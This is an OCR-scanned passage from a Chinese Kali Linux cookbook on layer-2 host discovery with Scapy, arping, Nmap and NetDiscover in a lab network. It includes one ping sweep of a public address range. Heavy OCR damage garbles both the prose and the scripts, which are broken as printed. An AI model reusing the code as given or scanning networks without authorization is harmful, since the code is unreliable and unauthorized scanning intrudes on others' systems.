不 对 应 实验 环境 网 络 上 的 活动 主机 ， 则 不 会 收 到 任何 响应 ， 并 且 该 功能 将 无 限 继续 
分 析 本 地 接口 上 传 入 的 流量 。 


你 可 以 使 用 Ctrl + C 强制 停止 该 函数 。 或 者 ， 你 可 以 指定 一 个 timeout 参数 来 
避免 此 问题 。 当 Scapy 在 Python 脚本 中 使 用 时 ， 超 时 的 使 用 将 变 得 至 关 重 要 。 
要 使 用 超时 ， 应 向 发 送 /接收 函数 提供 一 个 附加 参数 ， 指 定 等 待 传 入 响应 的 秒 数 : 


>>> arp request.pdst = "172.16.36.134" 
>>> sri(arp request, timeout-1) 
Begin emission: 


Received 3285 packets, got 0 answers, remaining 1 packets 
>>> 


通过 使 用 超时 功能 ， 发 送 到 非 响应 主机 的 请 求 将 在 指定 的 时 间 之 后 返回 ， 并 显示 捕 
获 到 0 个 应 答 。 此 外 ， 此 也 数 收 到 的 响应 也 可 以 赋 给 变量 ， 并 且 可 以 通过 访问 此 变 
量 对 响应 执行 后 续 处 理 : 


>>> response = sri(arp_request, timeout=1) 
Begin emission: 


Finished to send 1 packets. 


Received 37 packets, got 1 answers, remaining © packets 
>>> response.display() 
###[ ARP ]### 

hwtype- 0x1 

ptype= Ox800 

hwlen= 6 

plen= 4 

op= is-at 

hwsrc- 00:0c:29:3d:84:32 

psrc- 172.16.36.135 

hwdst- 00:0c:29:65:fc:d2 

pdst- 172.16.36.132 
###[ Padding ]### 

load= 'Nx00NxO0ONXxOONXOONXOONXOONXOONXOONXOONXOONXOONXOONXOO 

NX00NX00N. X00NX00NX00O ' 


Scapy 也 可 以 用 作 Python 脚本 语言 中 的 库 。 这 可 以 用 于 高 效 自动 执行 Scapy 中 执 
行 的 宛 余 任 务 。 Python 和 Scapy 可 以 用 于 循环 遍历 本 地 子 网 内 的 每 个 可 能 的 主机 
地 址 ， 并 向 每 个 子 网 发 送 ARP 请 求 。 下 面 的 示例 脚本 可 用 于 在 主机 的 连续 序列 上 
执行 第 二 层 发 现 : 


#!/usr/bin/python 


import logging 

import subprocess 
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 
from scapy.all import * 


if len(sys.argv) !- 2: 

print "Usage - ./arp disc.py [interface]" 

print "Example - ./arp disc.py etho" 

print "Example will perform an ARP scan of the local subnet 
to which ethO is assigned" 

sys.exit() 


interface = str(sys.argv[1]) 


ip = subprocess.check_output("ifconfig " + interface + " | grep 
‘inet addr’ | cut -d ':' -f 2 | cut -d ' ' -f 1", shell-True).st 
rip() 

prefix = ip split(’.")[0] + '.' + ip.split('.')[1] + '.' + ip.sp 


Te], ie) 


for addr in range(0, 254): 
answer=sr1(ARP(pdst=prefixtstr(addr) ), timeout=1, verbose=0 ) 


if answer == None: 
pass 
else: 
print prefix+str (addr) 


脚本 的 第 一 行 标识 了 Python 解释 器 所 在 的 位 置 ， 以 便 脚 本 可 以 在 不 传递 到 解释 器 
的 情况 下 执行 。 然后 脚本 导入 所 有 Scapy £t * JE 3; Scapy 日 志 记录 级 别 ， 以 
消除 脚本 中 不 必要 的 输出 。 还 导入 了 子 过 程 库 ， 以 便于 从 系统 调用 中 提取 信息 。 
第 二 个 代码 块 是 条 件 测试 ， 用 于 评估 是 否 向 脚本 提供 了 所 需 的 和 参数。 如 果 在 执行 时 
未 提供 所 需 的 参数 ， 则 脚本 将 输出 使 用 情况 的 说 明 。 该 说 明和 包括 工具 的 用 法 ， 示 例 
和 所 执行 任务 的 解释 。 


在 这 个 代码 块 之 后 ， 有 一 个 单独 的 代码 行将 所 提供 的 参数 赋值 给 interface € 
量 。 下 一 个 代码 块 使 用 check output() 子 进程 函数 执行 ifconfig 系统 调用 ， 
该 调用 也 使 用 grep fe cut 从 作为 参数 提供 的 本 地 接口 提取 P 地 址 。 然 后 将 此 输 
BRA ip 变量 。 然 后 使 用 split 函数 从 IP 地 址 字符 串 中 提取 / 24 网 络 前 
级。 例如 ， 如 果 ip 变量 包含 192.168.11.4 字符 串 ， 则 值 为 192.168.11 ° Č 
FRA prefix 变量 。 最 后 一 个 代码 块 是 一 个 用 于 执行 实际 扫描 的 for 循环 。 
for 循环 遍历 介 于 0 和 254 之 间 的 所 有 值 ， 并 且 对 于 每 次 迭代 ， 该 值 随后 附加 到 
网 络 前 级 后 面 。 在 早先 提供 的 示例 的 中 ， 将 针 

对 192.168.11.0 和 192.168.11.254 之 问 的 每 个 IP 地 址 广播 ARP 请 求 。 然 后 
对 于 每 个 回复 的 活动 主机 ， 将 相应 的 IP 地 址 打印 到 屏幕 上 ， 以 表明 主机 在 LAN 上 
活动 。 一 旦 脚本 被 写 入 本 地 目录 ， 你 可 以 在 终端 中 使 用 多 号 和 斜 枉 ， 然 后 是 可 执行 
脚本 的 名 称 来 执行 它 。 看 看 以 下 用 于 执行 脚本 的 命令 : 


root@KaliLinux:~# ./arp disc.py 

Usage - ./arp disc.py [interface] 

Example - ./arp disc.py ethO 

Example will perform an ARP scan of the local subnet to which et 
hO is assigned 


如 果 在 没有 提供 任何 参数 的 情况 下 执行 脚本 ， 则 会 将 使 用 情况 输出 到 屏幕 。 mid 
出 表明 此 脚本 需要 一 个 参数 ， 该 参数 定义 应 使 用 哪个 接口 执行 扫描 。 在 以 下 示例 
中 ， 使 用 etho 接口 执行 脚本 : 


root@KaliLinux:~# ./arp disc.py ethO 
172.16.36.1 

172.16.36.2 

172.16.36.132 

172.16.36.135 

172.16.36.254 


一 旦 运行 ， 脚 本 将 确定 提供 的 接口 的 本 地 子 网 ; 在 此 子 网 上 执行 ARP dade > AUSTR 
ida 自 这 些 |P 的 主机 的 响应 输出 |P 地 活动 址 列表 。 此 外 ，Wireshark 可 以 同时 运 

， 因 为 脚本 正在 运行 来 观察 如 何 按 顺序 广播 每 个 地 址 的 请 求 ， 以 及 活动 主机 如 何 
响应 这 文 此 请求 ， 如 以 下 屏幕 截图 所 示 : 


Broadcast ARP 42 Who has 172.16.36.1? Tell 172.16.36.67 
Vmware fd:01:05 ARP 60 172.16.36.1 is at 00:50:56:c0:00:08 
Broadcast ARP 42 Who has 172.16.36.2? Tell 172.16.36.67 
vmware fd:01:05 ARP 60 172.16.36.2 is at 00:50:56:ff:2a:8e 


此 外 ， 我 们 可 以 轻易 将 脚本 的 输出 重 定向 到 文本 文件 ， 然 后 可 以 用 于 随后 的 分 析 。 
可 以 使 用 尖 括 号 重 定向 输出 ， 后 跟 文 本 文件 的 名 称 。 一 个 例子 如 下 


root@KaliLinux:~# ./arp disc.py ethO > output.txt 
root@KaliLinux:~# ls output.txt 

output.txt 

root@KaliLinux:~# cat output.txt 

172.16.36.1 

172.16.36.2 

172.16.36.132 

172.16.36.135 

172.16.36.254 


一 旦 输出 重 定向 到 输出 文件 ， 你 可 以 使 用 1s 命令 验证 文件 是 否 已 写 入 文件 系 绩 
或 者 可 以 使 用 cat 命令 查看 文件 的 内 容 。 此 脚本 还 可 以 轻松 sew ore 
文件 中 包含 的 某 些 IP 地 址 执行 ARP 请 求 。 为 此 ， 我 们 首先 需要 创建 一 个 我 们 布 望 
扫描 的 IP 地 址 列表 。 为 此 ， 模 可 以 使 用 Nano 或 VIM 文本 编辑 器 。 为 了 评估 脚本 


的 功能 ， 请 包含 先 之 前 发 现 的 一 些 活 动 地 址 ， 以 及 位 于 不 对 应 任何 活动 主机 的 相同 
范围 内 AR 择 的 地 址 。 为 了 在 VIM 或 Nano 中 创建 输入 文件 ， 请 使 
用 以 下 命令 e. 


root@KaliLinux:~# vim iplist.txt 
root@KaliLinux:~# nano iplist.txt 


创建 输入 文件 后 ， 可 以 使 用 cat 命令 验证 其 内 容 。 假设 文件 已 正确 创建 ， 你 应 该 
会 看 到 你 在 文本 编辑 器 中 输入 的 IP 地 址 列表 : 


root@KaliLinux:~# cat iplist.txt 
172.16.36.1 

172.16.36.2 

172.16.36.232 

172.16.36.135 

172.16.36.180 

172.16.36.203 

172.16.36.205 

172.16.36.254 


为 了 创建 一 个 将 接受 文本 文件 作为 输入 的 脚本 ， 我 们 可 以 修改 上 一 个 练习 中 的 现 有 
脚本 ， 或 创建 一 个 新 的 脚本 文件 。 为 了 在 我 们 的 脚本 中 使 用 这 个 IP 地 址 列表 ， 我 
们 需要 在 Python 中 执行 一 些 文件 处 理 。 工作 脚本 的 示例 如 下 所 示 : 


#!/usr/bin/python 


import logging 
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 
from scapy.all import * 


if len(sys.argv) !- 2: 

print "Usage - ./arp disc.py [filename]" 

print "Example - -7arpsdzsc-py ipiis tT EX 

print "Example will perform an ARP scan of the IP addresses 
listed in 1plist.txt^ 

sys.exit() 


filename = str(sys.argv[i]) 
file = open(filename, 'r' ) 


for addr in file: 
answer = sri(ARP(pdst=addr.strip()),timeout=1, verbose=0 ) 
if answer == None: 
pass 
else: 
print addr.strip() 
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A file 而 不 是 interface 的 变量 。 然后 使 用 open() 函数 ， 通 过 在 脚本 的 相 

同 目录 中 打开 iplist.txt 文件 ， 来 创建 对 象 。 r 值 也 传递 给 函数 来 指定 对 文件 
的 只 读 访 问 。 for 循环 遍历 文件 中 列 出 的 每 个 IP 地 址 ， 然 后 输出 回复 ARP 广播 
请 求 的 IP 地址。 此 脚本 可 以 以 与 前 面 讨论 的 相同 方式 执行 : 


root@KaliLinux:~# ./arp disc.py 

Usage - ./arp disc.py [filename] 

Example - ./arp disc.py iplist.txt 

Example will perform an ARP scan of the IP addresses listed in i 
plist.txt 


如 果 在 没有 提供 任何 参数 的 情况 下 执行 脚本 ， 则 会 将 使 用 情况 输出 到 屏幕 。 使 用 情 
况 输出 表明 ， 此 脚本 需要 一 个 参数 ， 用 于 定义 要 扫描 的 IP 地 址 的 输入 列表 。 在 以 
下 示例 中 ， 使 用 执行 目录 中 的 iplist.txt 文件 执行 脚本 : 


root@KaliLinux:~# ./arp disc.py iplist.txt 
172.16.36.2 

172.16.36.1 

172.16.36.132 

172.16.36.135 

172.16.36.254 


一 旦 运行 ， 脚 本 只 会 输出 输入 文件 中 的 IP 地址， 并 且 也 响应 ARP 请 求 流量 。 x 
地 址 中 的 每 一 个 表示 在 LAN 上 的 活动 系统 。 使 用 与 前 面 讨 论 的 相同 的 方式 ， 此 脚 
本 的 输出 可 以 轻易 重 定向 到 一 个 文件 ， 使 用 尖 1 括 号 后 跟 输 出 文件 的 所 需 名 称 : 


root@KaliLinux:~# ./arp disc.py iplist.txt > output.txt 
root@KaliLinux:~# ls output.txt 

output.txt 

root@KaliLinux:~# cat output.txt 

172.16.36.2 

172.16.36.1 

172.16.36.132 

172.16.36.135 

172.16.36.254 


一 旦 将 输出 重 定向 到 输出 文件 ， 你 可 以 使 用 1s 命令 验证 文件 是 否 已 写 入 文件 系 
统 ， 或 者 可 以 使 用 cat 命令 查看 文件 的 内 容 。 


工作 原理 


通过 使 用 sri (发 送 /接收 单个 ) 功能 ， 可 以 在 Scapy 中 进行 ARP 发 现 。 36 
数 注入 由 提供 的 参数 定义 的 数据 包 ， 然 后 等 待 接收 单个 响应 。 在 这 种 情况 下 ， 我 们 
广播 了 单个 ARP 请 求 ， 并 且 函 数 将 返回 响应 。 Scapy 库 可 以 将 此 技术 轻易 集成 到 


脚本 中 ， 并 可 以 测试 多 个 系统 。 


2.2 使 用 ARPing 探索 第 二 层 


ARPing 是 一 个 命令 行 网 络 工具 ， 具 有 类 似 于 常用 的 ping 工具 的 功能 。 此 工具 可 
通过 提供 该 P 地 址 作为 参数 ， 来 识别 活动 主机 是 否 位 于 给 定 IP 的 本 地 网 络 上 。 这 
个 秘籍 将 讨论 如 何 使 用 ARPing 扫描 网 络 上 的 活动 主机 。 


准备 


要 使 用 ARPing 执行 ARP 发 现 ， 你 需要 在 LAN 上 至 少 拥 有 一 个 响应 ARP 请 求 的 
系统 。 提 供 的 示例 使 用 Linux 和 Windows 系统 的 组 合 。 有关 在 本 地 实验 环境 中 设 
置 系 统 的 更 多 信息 ， 请 参阅 第 一 章 入 中 的 “安装 Metasploitable2” 和 “安装 Windows 
Server 秘 籍 。 


此 外 ， 本 节 需 要 使 用 文本 编辑 器 (如 VIM 或 Nano) 将 脚本 写 入 文件 系统 。 有 关 编 
写 脚本 的 更 多 信息 ， 请 参阅 第 一 章 入 门 中 的 “使 用 文本 编辑 器 (VIM 和 Nano) " 秘 


H eo 


操作 步骤 


ARPing 是 一 种 工具 ， 可 用 于 发 送 ARP 请 求 并 标识 主机 是 否 活动 和 响应 。 该 工具 仅 
通过 将 IP 地 址 作为 参数 传递 给 它 来 使 用 : 


root@KaliLinux:~# arping 172.16.36.135 -c 1 

ARPING 172.16.36.135 

60 bytes from 00:0c:29:3d:84:32 (172.16.36.135): index=0 time=24 
9.000 usec 


--- 172.16.36.135 statistics -- 
1 packets transmitted, 1 packets received, 0% unanswered (0 ex 
tra) 


在 所 提供 的 示例 中 ， 单 个 ARP 请 求 被 发 送 给 广播 地 址 ， 请 求 172.16.36.135 IP 
地 址 的 物理 位 置 。 如 输出 所 示 ， 主 机 从 00:0C:29:3D:84:32 MAC 地 址 接收 
到 单个 应 答 。 此 工具 可 以 更 有 效 地 用 于 第 二 层 上 的 发 现 ， 扫 描 是 否 使 用 bash 脚本 
在 多 个 主机 上 同时 执行 此 操作 。 为 了 测试 bash 中 每 个 实例 的 响应 ， 我 们 应 该 确定 
响应 中 包含 的 唯一 字符 串 ， 它 标识 了 活动 主机 ， 但 不 包括 没有 收 到 响应 时 的 情况 。 
要 识别 唯一 字符 串 ， 应 该 对 无 响应 的 IP 地 址 进行 ARPing 请 求 : 


root@KaliLinux:~# arping 172.16.36.136 -c 1 
ARPING 172.16.36.136 


--- 172.16.36.136 statistics -- 


1 packets transmitted, 0 packets received, 100% unanswered (0 ex 
tra) 


通过 分 析 来 自 成 功 和 失败 的 不 同 ARP 响应 ， 你 可 能 注意 到 ， 如 果 存 在 所 提供 的 IP 
地 址 的 相关 活动 主机 ， 并 且 它 也 在 包含 在 IP 地 址 的 行内 ， 则 响应 中 存在 来 自 字符 
串 的 唯一 字 节 。 通过 对 此 响应 执行 grep ， 我 们 可 以 提取 每 个 响应 主机 的 IP 地 
址 : 


root@KaliLinux:~# arping -c 1 172.16.36.135 | grep "bytes from" 
60 bytes from 00:0c:29:34:84:32 (172.16.36.135): index-0 time=10 


.000 usec 
root@KaliLinux:~# arping -c 1 172.16.36.135 | grep "bytes from" 
| cut -d" "-f 4 


00:0c:29:3d:84:32 


我 们 可 以 仅仅 通过 处 理 提供 给 cut 函数 的 分 隔 符 和 字段 值 ， 从 返回 的 字符 串 中 轻 
松 地 提取 IP 地址: 


root@KaliLinux:~# arping -c 1 172.16.36.135 | grep "bytes from" 
60 bytes from 00:0c:29:34:84:32 (172.16.36.135): index-0 time-32 
8.000 usec 

root@KaliLinux:~# arping -c 1 172.16.36.135 | grep "bytes from" 
| cut -d " " -f 5 (172.16.36.135): 

root@KaliLinux:~# arping -c 1 172.16.36.135 | grep "bytes from" 
Peut on -f:5. [eut a "CY =f 2:1.72716.36-135):: 
root@KaliLinux:~# arping -c 1 172.16.36.135 | grep "bytes from" 
Meut 29 StS veut decere eB tss odi 
172.16.36.135 


在 识别 如 何 从 正面 ARPing 响应 中 提取 IP 在 bash 脚本 中 轻易 将 该 任务 传递 给 循 
环 ， 并 输出 实时 IP 地 址 列表 。 使 用 此 技术 的 脚本 的 示例 如 下 所 示 : 


#!/bin/bash 


if [ "$#" -ne 1 ]; then 

echo "Usage - ./arping.sh [interface]" 

echo "Example - ./arping.sh etho" 

echo "Example will perform an ARP scan of the local subnet t 
o which ethO is assigned" 

exit 
ipii 


interface-$1 
prefix=$(ifconfig $interface | grep 'inet addr' | 


cut sd *s" =f 2 sur d sr 1 cut sd r3) 
for addr in $(seq 1 254); do 
arping -c 1 $prefix.$addr | grep "bytes from" | cut -d " " -f 
5 | cut -d v. Sp 2 | cut -d "ys -f18& 
done 
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在 提供 的 bash 脚本 中 ， 第 一 行 定义 了 bash 解释 器 的 位 置 。 接 下 来 的 代码 块 执 行 
测试 ， 来 确定 是 否 提供 了 预期 的 参数 。 这 通过 评估 提供 的 参数 的 数量 是 否 不 等 于 1 
来 确定 。 如 果 未 提供 预期 参数 ， 则 输出 脚本 的 用 法 ， 并 且 退 出 脚本 。 用 法 输出 表 
明 ， 脚 本 预期 将 本 地 接口 名 称 作 为 参数 。 下 一 个 代码 块 将 提供 的 参数 赋 

给 interface 变量 。 然 后 将 接口 值 提供 给 ifconfig ， 然 后 使 用 输出 提取 网 络 前 
级 。 例 如 ， 如 果 提 供 的 接口 的 IP 地 址 是 192.168.11.4 ， 则 前 级 变量 将 赋 

为 192.168.11 。 然 后 使 用 for 循环 遍历 最 后 一 个 字 节 的 值 ， 来 在 本 地 / 24 网 
络 中 生成 每 个 可 能 的 IP 地 址 。 对 于 每 个 可 能 的 IP 地 址 ， 执 行 单个 arping 命令 。 
然后 对 每 个 请 求 的 响应 通过 管道 进行 传递 ， 然 后 使 用 grep 来 提取 带 有 短 

i& bytes 的 行 。 如 前 所 述 ， 这 只 会 提取 包含 活动 主机 的 IP 地 址 的 行 。 最 后 ， 使 用 
一 系列 cut 有 函数 从 此 输出 中 提取 IP 地 址 。 请 注意 ， 在 for 循环 任务 的 末尾 使 

用 & 符号 ， 而 不 是 分 号 。 符 号 允许 并 行 执 行 任务 ， 而 不 是 按 顺 序 执行 。 这 极 大 地 
减少 了 扫描 IP 范围 所 需 的 时 间 。 看 看 下 面 的 命令 集 : 


root@KaliLinux:~# ./arping.sh 

Usage - ./arping.sh [interface] 

Example - ./arping.sh ethO 

Example will perform an ARP scan of the local subnet to which et 
hO is assigned 


root@KaliLinux:~# ./arping.sh ethO 
172.16.36.1 

172.16.36.2 

172.16.36.132 

172.16.36.135 

172.16.36.254 


可 以 轻易 将 脚本 的 输出 重 定向 到 文本 文件 ， 然 后 用 村 随后 的 分 析 。 可 以 使 用 尖 括 号 
重 定向 输出 ， 后 跟 文本 文件 的 名 称 。 一 个 例子 如 下 


root@KaliLinux:~# ./arping.sh ethO > output.txt 
root@KaliLinux:~# ls output.txt 

output.txt 

root@KaliLinux:~# cat output.txt 

172.16.36.1 

172.16.36.2 

172.16.36.132 

172.16.36.135 

172.16.36.254 


o 你 就 可 以 使 用 ls 命令 验证 文件 是 否 已 写 入 文件 系 

， 或 者 可 以 使 用 cat 命令 查看 文件 的 内 容 。 此 脚本 还 可 以 修改 为 从 输入 文件 读 
" ， 并 仅 验 证 此 文件 中 列 出 的 主机 是 否 处 于 活动 状态 。 对 于 以 下 脚本 ， 你 需要 拥有 
IP 地 址 列表 的 输入 文件 。 为 此 ， 我 们 可 以 使 用 与 上 一 个 秘籍 中 讨论 的 Scapy 脚本 
所 使 用 的 相同 的 输入 文件 : 


#!/bin/bash 
if [ "$#" -ne 1 ]; then 

echo "Usage - ./arping.sh [input file]" 

echo "Example - ./arping.sh iplist.txt" 

echo "Example will perform an ARP scan of all IP addresses d 
efined in iplist.txt" 


exit 
fuk 
file-$1 
for addr in $(cat $file); do 
arping -c 1 $addr | grep "bytes from" | cut -d " " -f 5 | cu 
tou o E a T ee e tun 
done 


这 个 脚本 和 前 一 个 脚本 唯一 的 主要 区 别 是 ， 并 没有 提供 一 个 接口 名 ， 而 是 在 执行 脚 
本 时 提供 输入 列表 的 文件 名 。 这 个 参数 被 传递 给 文件 变量 。 然后， for 循环 用 于 
循环 遍历 此 文件 中 的 每 个 值 ， 来 执行 ARPing 任务 。 为 了 执行 脚本 ， 请 使 用 句号 和 
LAL > 后跟 可 执行 脚本 的 名 称 : 


root@KaliLinux:~# ./arping.sh 

Usage - ./arping.sh [input file] 

Example - ./arping.sh iplist.txt 

Example will perform an ARP scan of all IP addresses defined in 
iplist.txt 

root@KaliLinux:~# ./arping.sh iplist.txt 
172.16.36.1 

172.16.36.2 

172.16.36.132 

172.16.36.135 

172.16.36.254 


在 没有 提供 任何 参数 的 情况 下 执行 脚本 将 返回 脚本 的 用 法 。 此 用 法 表示 ， 应 提供 输 
入 文件 作为 参数 。 此 操作 完成 后 将 执行 脚本 ， 并 从 输入 的 IP 地 址 列表 返回 实时 IP 
地 址 列表 。 使 用 与 前 面 讨论 的 相同 的 方式 ， 此 脚本 的 输出 可 以 通过 尖 括 号 轻易 重 定 
向 到 输出 文件 。 一 个 例子 如 下 : 


root@KaliLinux:~# ./arping.sh iplist.txt > output.txt 
root@KaliLinux:~# ls output.txt 

output.txt 

root@KaliLinux:~# cat output.txt 

172.16.36.1 

172.16.36.2 

172.16.36.132 

172.16.36.135 

172.16.36.254 


一 旦 输出 重 定向 到 输出 文件 ， 你 可 以 使 用 1s 命令 验证 文件 是 否 已 写 入 文件 系统 ， 
或 者 可 以 使 用 cat 命令 查看 文件 的 内 容 。 


工作 原理 
ARPing 是 一 个 工具 ， 用 于 验证 单个 主机 是 否 在 线 。 然而 ， 它 的 base 法 的 使 我 们 
很 容易 操作 它 在 bash 中 按 顺 序 扫 描 多 个 主机 。 这 是 通过 循环 遍历 一 系列 IP 地 


址 ， 然 后 将 这 些 IP 地 址 作为 参数 提供 给 工具 来 完成 的 。 


2.3 使 用 Nmap 探索 第 二 层 
网 络 映射 器 & (Nmap) X Kali Linux 中 最 有 效 和 强大 的 工具 之 一 。 Nmap 可 以 用 于 


HITA He 2 围 的 乡 种 扫描 技术 ， 并 且 可 高 度 定制 。 这 个 工具 在 整 本 书 中 会 经 常 使 用 。 
在 这 个 特定 的 秘籍 中 ， 我 们 将 讨论 如 何 使 用 Nmap 执行 第 2 层 扫 描 


准备 


~ ABENQ OUI BRE NT 你 需要 在 LAN 上 至 少 拥有 一 个 响应 ARP 请 求 的 

系统 。 提供 的 Do Linux 和 Windows 系统 的 组 合 。 有 关 在 本 地 实验 环境 中 设 
in A 统 的 更 多 多 s 息 ， 请 参阅 第 一 章 入 中 的 “安装 Metasploitable2” 和 “安装 Windows 

Server 秘籍 


TE A 


Nmap 是 使 用 单个 命令 执行 自动 化 第 二 层 发 现 扫描 的 另 一 个 方案 。 -sn 选项 在 
Nmap 中 称 为 ping 扫描 。 虽然 术语 "ping 扫描 "自然 会 导致 你 认为 正在 执行 第 三 层 
发 现 ， 但 实际 上 是 自 适 应 的 。 假 设 将 同一 本 地 子 网 上 的 地 址 指定 为 参数 ， 可 以 使 用 
以 下 命令 执行 第 2 层 扫描 : 


root@KaliLinux:~# nmap 172.16.36.135 -Sn 

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-16 15:40 EST 
Nmap scan report for 172.16.36.135 

Host is up (0.00038s latency). 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds 


Lary LAN 广播 地 址 发 送 ARP 请 求 ， 并 根据 接收 到 TS t 确定 主机 是 否 处 于 活 
SS 如 果 对 不 活动 主机 的 IP 地 址 使 用 该 命令 ， 则 响应 会 表示 主机 关 
lal: 


root@KaliLinux:~# nmap 172.16.36.136 -sn 

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-16 15:51 EST 
Note: Host seems down. If it is really up, but blocking our ping 
probes, try -Pn 


Nmap done: 1 IP address (0 hosts up) scanned in 0.41 seconds 


我 们 可 以 修改 此 命令 ， 来 使 用 破 折 号 符号 对 一 系列 顺序 IP 地 址 执行 第 2 层 发 现 。 要 
扫描 完整 的 / 24 兴国 ， 可 以 使 用 0-255 


root@KaliLinux:~# nmap 172.16.36.0-255 -sn 
Starting 

Nmap 6.25 ( http://nmap.org ) at 2013-12-11 05:35 EST 
Nmap scan report for 172.16.36.1 

Host is up (0.00027s latency). 

MAC Address: 00:50:56:C0:00:08 (VMware) 
Nmap scan report for 172.16.36.2 

Host is up (0.00032s latency). 

MAC Address: 00:50:56:FF:2A:8E (VMware) 
Nmap scan report for 172.16.36.132 

Host is up. 

Nmap scan report for 172.16.36.135 

Host is up (0.00051s latency). 

MAC Address: 00:0C:29:3D:84:32 (VMware) 
Nmap scan report for 172.16.36.200 

Host is up (0.00026s latency). 

MAC Address: 00:0C:29:23:71:62 (VMware) 
Nmap scan report for 172.16.36.254 

Host is up (0.00015s latency). 

MAC Address: 00:50:56:EA:54:3A (VMware) 


Nmap done: 256 IP addresses (6 hosts up) scanned in 3.22 seconds 


使 用 此 命令 将 向 该 范围 内 的 所 有 主机 发 送 ARP 广播 请 求 ， 并 确定 每 个 主动 响应 的 
主机 。 也 可 以 使 用 -iL 选项 对 IP 地 址 的 输入 列表 执行 此 扫描 : 


root@KaliLinux:~# nmap -iL iplist.txt -Sn 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-16 16:07 EST 
Nmap scan report for 172.16.36.2 

Host is up (0.00026s latency). 

MAC Address: 00:50:56:FF:2A:8E (VMware) 

Nmap scan report for 172.16.36.1 


Host is up (0.00021s latency). 

MAC Address: 00:50:56:C0:00:08 (VMware) 
Nmap scan report for 172.16.36.132 

Host is up (0.00031s latency). 

MAC Address: 00:0C:29:65:FC:D2 (VMware) 
Nmap scan report for 172.16.36.135 

Host is up (0.00014s latency). 

MAC Address: 00:0C:29:3D:84:32 (VMware) 
Nmap scan report for 172.16.36.180 

Host is up. 

Nmap scan report for 172.16.36.254 

Host is up (0.00024s latency). 

MAC Address: 00:50:56:EF:B9:9C (VMware) 


Nmap done: 8 IP addresses (6 hosts up) scanned in 0.41 seconds 


当 使 用 -sn 选项 时 ，Nmap 将 首先 尝试 使 用 第 2 层 ARP 请 求 定 位 主机 ， 并 且 如 果 
主机 不 位 于 LAN 上 ， 它 将 仅 使 用 第 3 层 ICM 请 求 。 注意 对 本 地 网 络 

(在 172.16.36.0/24 专用 范围 ) 上 的 主机 执行 的 Nmap ping 扫描 才能 返回 
MAC 地 址 。 这 是 因为 MAC 地 址 由 来 自主 机 的 ARP 响应 返回 。 但 是 ， 如 果 对 不 
同 LAN 上 的 远程 主机 执行 相同 的 Nmap ping 扫描 ， 则 响应 不 会 包括 系统 的 MAC 
地 址 。 


root@KaliLinux:~# nmap -sn 74.125.21.0-255 

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-11 05:42 EST 
Nmap scan report for 74.125.21.0 

Host is up (0.0024s latency). 

Nmap scan report for 74.125.21.1 

Host is up (0.00017s latency). 

Nmap scan report for 74.125.21.2 

Host is up (0.00028s latency). 

Nmap scan report for 74.125.21.3 

Host is up (0.00017s latency). 


当 对 远程 网 络 范围 (公共 范围 74.125.21.0/24 ) 执行 时 ， 你 可 以 看 到 ， 使 用 了 
第 三 层 发 现 ， 因 为 没有 返回 MAC 地 址 。 这 表明 ，Nmap 会 尽 可 能 自动 利用 第 二 层 
发 现 的 速度 ， 但 在 必要 时 ， 它 将 使 用 可 路 由 的 ICMP 请 求 ， 在 第 三 层 上 发 现 远 程 主 
机 。 如 果 你 使 用 Wireshark 监控 流量 ， 而 Nmap 对 本 地 网 络 上 的 主机 执行 ping da 
d$ o 在 以 下 屏幕 截图 中 ， 你 可 以 看 到 Nmap 利用 ARP 请 求 来 识别 本 地 段 范围 内 的 
主机 : 


No Destination Protocol Info 


498 Broadcast ARP Who has 172.16.36.102? Tell 172.16.36.232 

499 Broadcast ARP Who has 172.16.36.125? Tell 172.16.36.232 

500 Broadcast ARP Who has 172.16.36.163? Tell 172.16.36.232 

501 Broadcast ARP Who has 172.16.36.164? Tell 172.16.36.232 

502 Broadcast ARP Who has 172.16.36.196? Tell 172.16.36.232 

503 Broadcast ARP Who has 172.16.36.31? Tell 172.16.36.232 
工作 原理 


Nmap 已 经 高 度 功能 化 ， 需 要 很 少 甚至 无 需 调 整 就 可 以 运行 所 需 的 扫描 。 底层 的 原 
理 是 一 样 的 。 Nmap 将 ARP 请 求 发 送 到 一 系列 IP 地 址 的 广播 地 址 ， 并 通过 标记 响 
应 来 识别 活动 主机 。 但 是 ， 由 于 此 功能 已 集成 到 Nmap 中 ， 因 此 可 以 通过 提供 适 
当 的 参数 来 执行 。 


2.4 使 用 NetDiscover 探索 第 二 层 


NetDiscover 是 一 个 工具 ， 用 于 通过 ARP 主动 和 被 动 分 析 识 别 网 络 主 机 。 它 主要 是 
在 无 线 接口 上 使 用 ; 然而 ， 它 在 其 它 环境 中 上 也 具有 功能 。 在 这 个 特定 的 秘籍 中 ， 
我 们 将 讨论 如 何 使 用 NetDiscover 进行 主动 和 被 动 扫描 。 


准备 


要 使 用 NetDiscover 执行 ARP 发 现 ， 你 需要 在 LAN 上 至 少 拥 有 一 个 响应 ARP 请 
求 的 系统 。 提供 的 示例 使 用 Linux 和 Windows 系统 的 组 合 。 有 关 在 本 地 实验 环境 
中 设置 系统 的 更 多 信息 ， 请 参阅 第 一 章 入 中 的 “安装 Metasploitable2”" 和 “安装 
Windows Server 秘籍 。 


操作 步骤 


NetDiscover 是 专门 为 执行 第 2 层 发 现 而 设计 的 工具 。 NetDiscover 可 以 用 于 扫描 一 
系列 IP 地 址 ， 方 法 是 使 用 -r 选项 以 CIDR 表示 法 中 的 网 络 范围 作为 参数 。 输 出 
将 生成 一 个 表格 ， 其 中 列 出 了 活动 IP 地 址 ， 相 应 的 MAC 地 址 ， 响 应 数量 ， 响 应 的 
长 度 和 MAC 厂商 : 


root@KaliLinux:~# netdiscover -r 172.16.36.0/24 


Currently scanning: Finished! | Screen View: Unique Hosts 
5 Captured ARP Req/Rep packets, from 5 hosts. Total size: 300 








IP At MAC Address Count Len MAC Vendor 
172.16.36.1 00:50:56:c0:00:08 91 960 VMWare, Inc. 
172.16.36.2 00:50:56:ff:2a:8e 91 060 VMWare, Inc. 


172.16.36.132 00:0c:29:65:fc:d2 01 060 VMware, Inc. 
172.16.36.135 00:0c:29:3d:84:32 01 060 VMware, Inc. 
172.16.36.254 00:50:56:ef:b9:9c 01 060 VMWare, Inc. 


